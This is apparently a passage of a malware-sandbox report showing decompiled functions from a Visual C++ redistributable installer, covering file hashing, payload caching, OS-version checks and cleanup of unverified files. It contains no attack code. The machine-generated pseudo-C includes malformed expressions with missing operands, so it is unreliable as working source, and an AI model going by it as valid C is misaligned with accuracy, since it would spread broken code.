                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 38%
                                                                          			E0004F961(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, long _a24) {
                                                                          				signed int _v8;
                                                                          				void _v4104;
                                                                          				char _v4108;
                                                                          				long _v4112;
                                                                          				long _v4116;
                                                                          				intOrPtr _v4120;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t30;
                                                                          				long** _t36;
                                                                          				char* _t37;
                                                                          				char* _t41;
                                                                          				signed short _t46;
                                                                          				void* _t47;
                                                                          				signed short _t49;
                                                                          				void* _t50;
                                                                          				signed short _t51;
                                                                          				signed short _t52;
                                                                          				signed short _t53;
                                                                          				signed short _t54;
                                                                          				void* _t55;
                                                                          				long _t56;
                                                                          				void* _t57;
                                                                          				void* _t60;
                                                                          				void* _t61;
                                                                          				void* _t62;
                                                                          				void* _t63;
                                                                          				void* _t64;
                                                                          				void* _t66;
                                                                          				signed int _t85;
                                                                          
                                                                          				_t60 = __edx;
                                                                          				E00059F00();
                                                                          				_t30 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t30 ^ _t85;
                                                                          				_t56 = _a24;
                                                                          				_t62 = _a4;
                                                                          				_v4120 = _a16;
                                                                          				_t65 = 0;
                                                                          				_v4116 = 0;
                                                                          				_v4108 = 0;
                                                                          				_v4112 = 0;
                                                                          				E0003F670(_t62,  &_v4104, 0, 0x1000);
                                                                          				_t36 =  &_v4116;
                                                                          				__imp__CryptAcquireContextW(_t36, 0, 0, _a8, 0xf0000040, _t61, _t64, _t55);
                                                                          				if(_t36 != 0) {
                                                                          					_t37 =  &_v4108;
                                                                          					__imp__CryptCreateHash(_v4116, _a12, 0, 0, _t37);
                                                                          					if(_t37 != 0) {
                                                                          						while(ReadFile(_t62,  &_v4104, 0x1000,  &_v4112, 0) != 0) {
                                                                          							_push(0);
                                                                          							if(_v4112 == _t65) {
                                                                          								_t41 =  &_a20;
                                                                          								__imp__CryptGetHashParam(_v4108, 2, _v4120, _t41);
                                                                          								if(_t41 != 0) {
                                                                          									if(_t56 != 0) {
                                                                          										_push(1);
                                                                          										if(SetFilePointerEx(_t62, 0, 0, _t56) == 0) {
                                                                          											_t46 = GetLastError();
                                                                          											_t69 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
                                                                          											_t47 = 0x80004005;
                                                                          											_t65 =  >=  ? 0x80004005 :  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
                                                                          											_push( >=  ? 0x80004005 :  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000);
                                                                          											_push(0xfa);
                                                                          											goto L8;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_t49 = GetLastError();
                                                                          									_t72 =  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
                                                                          									_t47 = 0x80004005;
                                                                          									_t65 =  >=  ? 0x80004005 :  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
                                                                          									_push( >=  ? 0x80004005 :  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000);
                                                                          									_push(0xf3);
                                                                          									goto L8;
                                                                          								}
                                                                          							} else {
                                                                          								_t50 =  &_v4104;
                                                                          								__imp__CryptHashData(_v4108, _t50, _v4112);
                                                                          								if(_t50 == 0) {
                                                                          									_t51 = GetLastError();
                                                                          									_t75 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          									_t47 = 0x80004005;
                                                                          									_t65 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          									_push( >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000);
                                                                          									_push(0xec);
                                                                          									goto L8;
                                                                          								} else {
                                                                          									continue;
                                                                          								}
                                                                          							}
                                                                          							goto L9;
                                                                          						}
                                                                          						_t52 = GetLastError();
                                                                          						_t78 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                          						_t47 = 0x80004005;
                                                                          						_t65 =  >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                          						_push( >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000);
                                                                          						_push(0xe1);
                                                                          					} else {
                                                                          						_t53 = GetLastError();
                                                                          						_t81 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
                                                                          						_t47 = 0x80004005;
                                                                          						_t65 =  >=  ? 0x80004005 :  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
                                                                          						_push( >=  ? 0x80004005 :  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000);
                                                                          						_push(0xd9);
                                                                          					}
                                                                          					goto L8;
                                                                          				} else {
                                                                          					_t54 = GetLastError();
                                                                          					_t84 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          					_t47 = 0x80004005;
                                                                          					_t65 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          					_push( >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000);
                                                                          					_push(0xd3);
                                                                          					L8:
                                                                          					_push("cryputil.cpp");
                                                                          					E000137D3(_t47);
                                                                          				}
                                                                          				L9:
                                                                          				if(_v4108 != 0) {
                                                                          					__imp__CryptDestroyHash(_v4108);
                                                                          				}
                                                                          				if(_v4116 != 0) {
                                                                          					CryptReleaseContext(_v4116, 0);
                                                                          				}
                                                                          				_pop(_t63);
                                                                          				_pop(_t66);
                                                                          				_pop(_t57);
                                                                          				return E0003DE36(_t57, _v8 ^ _t85, _t60, _t63, _t66);
                                                                          			}
                                                                          0x0004faa7
                                                                          0x0004faaa
                                                                          0x0004faab
                                                                          0x0004fa17
                                                                          0x0004fa17
                                                                          0x0004fa28
                                                                          0x0004fa2b
                                                                          0x0004fa32
                                                                          0x0004fa35
                                                                          0x0004fa36
                                                                          0x0004fa36
                                                                          0x00000000
                                                                          0x0004f9d0
                                                                          0x0004f9d0
                                                                          0x0004f9e1
                                                                          0x0004f9e4
                                                                          0x0004f9eb
                                                                          0x0004f9ee
                                                                          0x0004f9ef
                                                                          0x0004fab0
                                                                          0x0004fab0
                                                                          0x0004fab5
                                                                          0x0004fab5
                                                                          0x0004faba
                                                                          0x0004fac1
                                                                          0x0004fac9
                                                                          0x0004fac9
                                                                          0x0004fad6
                                                                          0x0004fae0
                                                                          0x0004fae0
                                                                          0x0004faeb
                                                                          0x0004faec
                                                                          0x0004faef
                                                                          0x0004faf8

                                                                          APIs
                                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00029CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 0004F9C6
                                                                          • GetLastError.KERNEL32 ref: 0004F9D0
                                                                          • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 0004FA0D
                                                                          • GetLastError.KERNEL32 ref: 0004FA17
                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 0004FAC9
                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0004FAE0
                                                                          • GetLastError.KERNEL32 ref: 0004FAFB
                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 0004FB33
                                                                          • GetLastError.KERNEL32 ref: 0004FB3D
                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 0004FB76
                                                                          • GetLastError.KERNEL32 ref: 0004FB84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CryptErrorLast$Hash$Context$AcquireCreateDestroyFileParamPointerRelease
                                                                          • String ID: @Met$cryputil.cpp
                                                                          • API String ID: 1716956426-3149263966
                                                                          • Opcode ID: e4a64afce194d75bcfe77f2486f02bd12b9359383b5e3b8a3bea1082b6aa36ed
                                                                          • Instruction ID: b2b946b4bd93cf915b3e0625576cae15c4ff94d732e23dd465384550442fd0f8
                                                                          • Opcode Fuzzy Hash: e4a64afce194d75bcfe77f2486f02bd12b9359383b5e3b8a3bea1082b6aa36ed
                                                                          • Instruction Fuzzy Hash: CA51B372E00325ABFB319A658C04BFB76E8EB08742F014176FE4DE7190E7749D909AE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E00029C99(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				intOrPtr _t52;
                                                                          				intOrPtr _t53;
                                                                          				intOrPtr _t54;
                                                                          				intOrPtr* _t81;
                                                                          				intOrPtr _t84;
                                                                          				intOrPtr _t85;
                                                                          				intOrPtr _t87;
                                                                          				void* _t88;
                                                                          
                                                                          				_t79 = __edx;
                                                                          				_t75 = __ecx;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t83 = E00028711(__ecx, __edx, _a4, _a12,  &_v16);
                                                                          				if(_t46 >= 0) {
                                                                          					_t81 = _a8;
                                                                          					_t84 = E00012D79(__ecx, _v16,  *((intOrPtr*)(_t81 + 0x18)),  &_v12);
                                                                          					__eflags = _t84;
                                                                          					if(_t84 >= 0) {
                                                                          						_t85 = E00028E92(__edx, _t81, _v12);
                                                                          						__eflags = _t85;
                                                                          						if(_t85 < 0) {
                                                                          							__eflags = _t85 - 0x80070003;
                                                                          							if(_t85 != 0x80070003) {
                                                                          								__eflags = _t85 - 0x80070002;
                                                                          								if(__eflags != 0) {
                                                                          									E000500CF(_t79, __eflags, _t85, 0xe0000136, 0,  *_t81, _v12, 0);
                                                                          									E00054038(_t75, __eflags, _v12);
                                                                          								}
                                                                          							}
                                                                          							_t84 = E000287DC(_t75, _a4,  *_t81,  &_v8);
                                                                          							__eflags = _t84;
                                                                          							if(_t84 >= 0) {
                                                                          								_t52 = E00054315(_a16, 0);
                                                                          								__eflags = _t52;
                                                                          								if(_t52 == 0) {
                                                                          									_t53 = E00054315(_v8, 0);
                                                                          									__eflags = _t53;
                                                                          									if(_t53 != 0) {
                                                                          										L17:
                                                                          										_t54 = E00028BE5(_t75, _a4, _v8);
                                                                          										__eflags = _t54;
                                                                          										if(_t54 >= 0) {
                                                                          											_t87 = E00028E92(_t79, _t81, _v8);
                                                                          											__eflags = _t87;
                                                                          											if(__eflags >= 0) {
                                                                          												_push(_v12);
                                                                          												__eflags = _a20;
                                                                          												_t57 =  ==  ? "copying" : "moving";
                                                                          												_push( ==  ? "copying" : "moving");
                                                                          												_push(_v8);
                                                                          												E0001550F(2, 0x20000131,  *_t81);
                                                                          												_t88 = _t88 + 0x18;
                                                                          												_t87 = E000541D1(_v8, _v12, 1, 1, 3, 0x7d0);
                                                                          												__eflags = _t87;
                                                                          												if(_t87 >= 0) {
                                                                          													__imp__DecryptFileW(_v12, 0);
                                                                          													goto L25;
                                                                          												}
                                                                          												_push(_v12);
                                                                          												_push("Failed to move verified file to complete payload path: %ls");
                                                                          												L23:
                                                                          												_push(_t87);
                                                                          												E0005012F();
                                                                          												goto L25;
                                                                          											}
                                                                          											E000500CF(_t79, __eflags, _t87, 0xe0000136, 0,  *_t81, _v8, 0);
                                                                          											E00054038(_t75, __eflags, _v8);
                                                                          											goto L25;
                                                                          										}
                                                                          										_push( *_t81);
                                                                          										_push("Failed to reset permissions on unverified cached payload: %ls");
                                                                          										goto L23;
                                                                          									}
                                                                          									_push(_v8);
                                                                          									_push(_a16);
                                                                          									_t87 = 0x80070002;
                                                                          									E0005012F(0x80070002, "Failed to find payload: %ls in working path: %ls and unverified path: %ls",  *_t81);
                                                                          									goto L25;
                                                                          								}
                                                                          								_t87 = E00028E33(_a16, _v8, _a20);
                                                                          								__eflags = _t87;
                                                                          								if(_t87 >= 0) {
                                                                          									goto L17;
                                                                          								}
                                                                          								_push( *_t81);
                                                                          								_push("Failed to transfer working path to unverified path for payload: %ls.");
                                                                          								goto L23;
                                                                          							} else {
                                                                          								_push("Failed to create unverified path.");
                                                                          								L11:
                                                                          								_push(_t84);
                                                                          								E0005012F();
                                                                          								L25:
                                                                          								L26:
                                                                          								if(_v8 != 0) {
                                                                          									E000554EF(_v8);
                                                                          								}
                                                                          								if(_v12 != 0) {
                                                                          									E000554EF(_v12);
                                                                          								}
                                                                          								if(_v16 != 0) {
                                                                          									E000554EF(_v16);
                                                                          								}
                                                                          								return _t87;
                                                                          							}
                                                                          						}
                                                                          						__imp__DecryptFileW(_v12, 0);
                                                                          						_push(_v12);
                                                                          						E0001550F(2, 0x20000130,  *_t81);
                                                                          						goto L25;
                                                                          					}
                                                                          					_push("Failed to concat complete cached path.");
                                                                          					goto L11;
                                                                          				}
                                                                          				E0005012F(_t83, "Failed to get cached path for package with cache id: %ls", _a12);
                                                                          				goto L26;
                                                                          			}















                                                                          Strings
                                                                          • Failed to create unverified path., xrefs: 00029D69
                                                                          • Failed to move verified file to complete payload path: %ls, xrefs: 00029E68
                                                                          • Failed to transfer working path to unverified path for payload: %ls., xrefs: 00029D9F
                                                                          • Failed to concat complete cached path., xrefs: 00029CEF
                                                                          • Failed to get cached path for package with cache id: %ls, xrefs: 00029CC3
                                                                          • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 00029DC6
                                                                          • copying, xrefs: 00029E27
                                                                          • Failed to reset permissions on unverified cached payload: %ls, xrefs: 00029DEC
                                                                          • moving, xrefs: 00029E2C, 00029E34
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                          • API String ID: 0-1289240508
                                                                          • Opcode ID: 659d7bf1b1d1b711482d4fa8e788047cd29159fdfa0416352e78110a3f4f7d16
                                                                          • Instruction ID: 5ae98aa7263b4f661b3924a8eef9dc36f725861f502e011974780157ff7a2ca1
                                                                          • Opcode Fuzzy Hash: 659d7bf1b1d1b711482d4fa8e788047cd29159fdfa0416352e78110a3f4f7d16
                                                                          • Instruction Fuzzy Hash: 33514135D40529BBDF226BD0DC02FEEBB76AF04701F214155FE00751A2E7729EA4AB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 19%
                                                                          			E00016184(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				struct _OSVERSIONINFOEXW _v292;
                                                                          				intOrPtr _v300;
                                                                          				intOrPtr _v312;
                                                                          				signed int _v316;
                                                                          				intOrPtr _v320;
                                                                          				signed int _v324;
                                                                          				void* __ebx;
                                                                          				signed int __edi;
                                                                          				intOrPtr* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t33;
                                                                          				signed int _t42;
                                                                          				signed short _t49;
                                                                          				intOrPtr _t52;
                                                                          				signed int _t53;
                                                                          				intOrPtr _t59;
                                                                          				void* _t60;
                                                                          				void* _t61;
                                                                          				void* _t62;
                                                                          				void* _t64;
                                                                          				signed int _t68;
                                                                          
                                                                          				_t59 = __edx;
                                                                          				_t33 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t33 ^ _t68;
                                                                          				_t52 = _a8;
                                                                          				E0003F670(_t60,  &_v292, 0, 0x11c);
                                                                          				_v292.dwOSVersionInfoSize = 0x11c;
                                                                          				_t61 =  &_v316;
                                                                          				_t53 = 6;
                                                                          				memset(_t61, 0, _t53 << 2);
                                                                          				_t62 = _t61 + _t53;
                                                                          				if(GetVersionExW( &_v292) != 0) {
                                                                          					_t42 = _a4 + 0xfffffffc;
                                                                          					if(_t42 <= 9) {
                                                                          						switch( *((intOrPtr*)(_t42 * 4 +  &M00016338))) {
                                                                          							case 0:
                                                                          								_t48 = _v292.wProductType & 0x000000ff;
                                                                          								asm("cdq");
                                                                          								_v312 = _t59;
                                                                          								_v300 = 1;
                                                                          								goto L21;
                                                                          							case 1:
                                                                          								__eax = _v292.wSuiteMask;
                                                                          								__eax = _v292.wSuiteMask >> 2;
                                                                          								goto L6;
                                                                          							case 2:
                                                                          								__eax = _v292.wSuiteMask;
                                                                          								__eax = _v292.wSuiteMask >> 7;
                                                                          								goto L6;
                                                                          							case 3:
                                                                          								__eax = _v292.wSuiteMask;
                                                                          								__eax = _v292.wSuiteMask >> 1;
                                                                          								goto L6;
                                                                          							case 4:
                                                                          								__eax = _v292.wSuiteMask;
                                                                          								__eax = _v292.wSuiteMask >> 9;
                                                                          								goto L6;
                                                                          							case 5:
                                                                          								__eax = _v292.wSuiteMask;
                                                                          								goto L6;
                                                                          							case 6:
                                                                          								__eax = _v292.wSuiteMask;
                                                                          								__eax = _v292.wSuiteMask >> 5;
                                                                          								goto L6;
                                                                          							case 7:
                                                                          								__eax = _v292.wSuiteMask;
                                                                          								__eax = _v292.wSuiteMask >> 0xa;
                                                                          								L6:
                                                                          								__edi = 0;
                                                                          								__edi = 1;
                                                                          								__eax = __eax & 1;
                                                                          								goto L7;
                                                                          							case 8:
                                                                          								__edi = 0;
                                                                          								__edi = 1;
                                                                          								_push(1);
                                                                          								_push(2);
                                                                          								_push(0);
                                                                          								_push(0);
                                                                          								__esi = __imp__VerSetConditionMask;
                                                                          								__eax =  *__esi();
                                                                          								_push(1);
                                                                          								_push(1);
                                                                          								_push(__edx);
                                                                          								_push(__eax);
                                                                          								__eax =  *__esi();
                                                                          								_push(1);
                                                                          								_push(0x20);
                                                                          								_push(__edx);
                                                                          								_push(__eax);
                                                                          								__eax =  *__esi();
                                                                          								_push(1);
                                                                          								_push(0x10);
                                                                          								_push(__edx);
                                                                          								_push(__eax);
                                                                          								__eax =  *__esi();
                                                                          								_push(__edx);
                                                                          								 &_v292 = VerifyVersionInfoW( &_v292, 0x33,  &_v292);
                                                                          								L7:
                                                                          								asm("cdq");
                                                                          								_v312 = __edx;
                                                                          								goto L20;
                                                                          							case 9:
                                                                          								__eax = _v292.wSuiteMask;
                                                                          								__edi = 0;
                                                                          								__edi = 1;
                                                                          								if((__al & 0x00000010) == 0) {
                                                                          									L18:
                                                                          									asm("xorps xmm0, xmm0");
                                                                          									asm("movlpd [ebp-0x140], xmm0");
                                                                          									__esi = _v320;
                                                                          									__eax = _v324;
                                                                          								} else {
                                                                          									__eax = __eax & 0x00000100;
                                                                          									__ecx = 0;
                                                                          									if(__cx != __ax) {
                                                                          										goto L18;
                                                                          									} else {
                                                                          										__eax = 1;
                                                                          									}
                                                                          								}
                                                                          								_v312 = __esi;
                                                                          								L20:
                                                                          								_v300 = __edi;
                                                                          								L21:
                                                                          								_v316 = _t48;
                                                                          								goto L22;
                                                                          						}
                                                                          					}
                                                                          					L22:
                                                                          					_t64 = E0002FF73(_t59,  &_v316, _t52);
                                                                          					if(_t64 < 0) {
                                                                          						_push("Failed to set variant value.");
                                                                          						goto L24;
                                                                          					}
                                                                          				} else {
                                                                          					_t49 = GetLastError();
                                                                          					_t67 =  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
                                                                          					_t64 =  >=  ? 0x80004005 :  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "variable.cpp", 0x6a1, _t64);
                                                                          					_push("Failed to get OS info.");
                                                                          					L24:
                                                                          					_push(_t64);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return E0003DE36(_t52, _v8 ^ _t68, _t59, _t62, _t64);
                                                                          			}

                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(0000011C), ref: 000161D2
                                                                          • GetLastError.KERNEL32 ref: 000161DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastVersion
                                                                          • String ID: @Met$Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 305913169-3137693696
                                                                          • Opcode ID: 3a4baa96aa351c8be36cea74f55e1c0ec2f49885ff1b0067c10e9b20bcec5e3a
                                                                          • Instruction ID: f0dedcc37b931de7b9d5ac23cce31b5bb6f08f9eba3c9fab2591ac34d3f16e76
                                                                          • Opcode Fuzzy Hash: 3a4baa96aa351c8be36cea74f55e1c0ec2f49885ff1b0067c10e9b20bcec5e3a
                                                                          • Instruction Fuzzy Hash: FE418871E05628ABDB30DBA9CC45FEF7BB8EB89710F10019AF909E7141D6759E81CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E0002993E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				short _v38;
                                                                          				struct _WIN32_FIND_DATAW _v600;
                                                                          				char _v604;
                                                                          				char _v608;
                                                                          				WCHAR* _v612;
                                                                          				void* __ebp;
                                                                          				signed int _t39;
                                                                          				signed int _t60;
                                                                          				void* _t63;
                                                                          				signed int _t65;
                                                                          				void* _t68;
                                                                          				void* _t69;
                                                                          				void* _t72;
                                                                          				void* _t74;
                                                                          				void* _t75;
                                                                          				signed int _t76;
                                                                          
                                                                          				_t74 = __esi;
                                                                          				_t73 = __edi;
                                                                          				_t72 = __edx;
                                                                          				_t69 = __ecx;
                                                                          				_t68 = __ebx;
                                                                          				_t39 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t39 ^ _t76;
                                                                          				_v604 = 0;
                                                                          				_v612 = 0;
                                                                          				_v608 = 0;
                                                                          				E0003F670(__edi,  &_v600, 0, 0x250);
                                                                          				if(E0002A189(_t69, _a4, L".unverified",  &_v604) >= 0) {
                                                                          					E00013BC3(_t72, _v604, 7);
                                                                          				}
                                                                          				if(_a4 != 0 || E000280AE(_t72, _a8,  &_v604) < 0 || E00012D79(_t69, _v604, L"*.*",  &_v612) < 0) {
                                                                          					L16:
                                                                          					if(_v608 != 0) {
                                                                          						E000554EF(_v608);
                                                                          					}
                                                                          					if(_v612 != 0) {
                                                                          						E000554EF(_v612);
                                                                          					}
                                                                          					if(_v604 != 0) {
                                                                          						E000554EF(_v604);
                                                                          					}
                                                                          					return E0003DE36(_t68, _v8 ^ _t76, _t72, _t73, _t74);
                                                                          				} else {
                                                                          					_push(_t74);
                                                                          					_t75 = FindFirstFileW(_v612,  &_v600);
                                                                          					if(_t75 == 0xffffffff) {
                                                                          						L15:
                                                                          						_pop(_t74);
                                                                          						goto L16;
                                                                          					} else {
                                                                          						goto L6;
                                                                          					}
                                                                          					do {
                                                                          						L6:
                                                                          						if((_v600.dwFileAttributes & 0x00000010) != 0) {
                                                                          							goto L13;
                                                                          						}
                                                                          						_v38 = 0;
                                                                          						_t60 = lstrlenW( &(_v600.cFileName));
                                                                          						if(_t60 <= 2) {
                                                                          							L11:
                                                                          							_t63 = E00012D79(_t69, _v604,  &(_v600.cFileName),  &_v608);
                                                                          							_t89 = _t63;
                                                                          							if(_t63 >= 0) {
                                                                          								E00054038(_t69, _t89, _v608);
                                                                          							}
                                                                          							goto L13;
                                                                          						}
                                                                          						_t69 = 0x2e;
                                                                          						if(_t69 !=  *((intOrPtr*)(_t76 + _t60 * 2 - 0x22c))) {
                                                                          							goto L11;
                                                                          						}
                                                                          						_t65 =  *(_t76 + _t60 * 2 - 0x22a) & 0x0000ffff;
                                                                          						_t69 = 0x52;
                                                                          						if(_t69 == _t65) {
                                                                          							goto L13;
                                                                          						}
                                                                          						_t69 = 0x72;
                                                                          						if(_t69 == _t65) {
                                                                          							goto L13;
                                                                          						}
                                                                          						goto L11;
                                                                          						L13:
                                                                          					} while (FindNextFileW(_t75,  &_v600) != 0);
                                                                          					FindClose(_t75);
                                                                          					goto L15;
                                                                          				}
                                                                          			}





















                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,00000000,.unverified,?), ref: 000299ED
                                                                          • lstrlenW.KERNEL32(?), ref: 00029A14
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00029A74
                                                                          • FindClose.KERNEL32(00000000), ref: 00029A7F
                                                                            • Part of subcall function 00013BC3: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00013C3F
                                                                            • Part of subcall function 00013BC3: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013C52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                          • String ID: *.*$.unverified
                                                                          • API String ID: 457978746-2528915496
                                                                          • Opcode ID: 872cef537130b2314592f93bb935aba36d3da743d93278e59e780cef7edbbb65
                                                                          • Instruction ID: 422a58305c53c566ea1202305ec6c2d876cd30551f35041c1ae1eb8fa30b5837
                                                                          • Opcode Fuzzy Hash: 872cef537130b2314592f93bb935aba36d3da743d93278e59e780cef7edbbb65
                                                                          • Instruction Fuzzy Hash: E5418E3190063CAEDF60AB64EC49BEAB7B8AF44306F4001A5E908E50A1EB759EC4CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 45%
                                                                          			E00058733(void* __ebx, signed int __edx, intOrPtr _a4, struct _SYSTEMTIME* _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				struct _SYSTEMTIME _v24;
                                                                          				struct _TIME_ZONE_INFORMATION _v196;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t26;
                                                                          				signed int _t35;
                                                                          				void* _t37;
                                                                          				void* _t54;
                                                                          				signed int _t55;
                                                                          				void* _t56;
                                                                          				intOrPtr _t61;
                                                                          				struct _SYSTEMTIME* _t62;
                                                                          				signed int _t63;
                                                                          
                                                                          				_t59 = __edx;
                                                                          				_t54 = __ebx;
                                                                          				_t26 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t26 ^ _t63;
                                                                          				_t62 = _a8;
                                                                          				_t61 = _a4;
                                                                          				if(_a12 == 0) {
                                                                          					GetTimeZoneInformation( &_v196);
                                                                          					SystemTimeToTzSpecificLocalTime( &_v196, _t62,  &_v24);
                                                                          					asm("cdq");
                                                                          					_t55 = 0x3c;
                                                                          					_t35 = (_v196.Bias ^ _t59) - _t59;
                                                                          					_t59 = _t35 % _t55;
                                                                          					_push(_t35 % _t55);
                                                                          					_push(_t35 / _t55);
                                                                          					_t37 = 0x2d;
                                                                          					_t56 = 0x2b;
                                                                          					_t38 =  <=  ? _t56 : _t37;
                                                                          					_push( <=  ? _t56 : _t37);
                                                                          					_push(_v24.wSecond & 0x0000ffff);
                                                                          					_push(_v24.wMinute & 0x0000ffff);
                                                                          					_push(_v24.wHour & 0x0000ffff);
                                                                          					_push(_v24.wDay & 0x0000ffff);
                                                                          					_push(_v24.wMonth & 0x0000ffff);
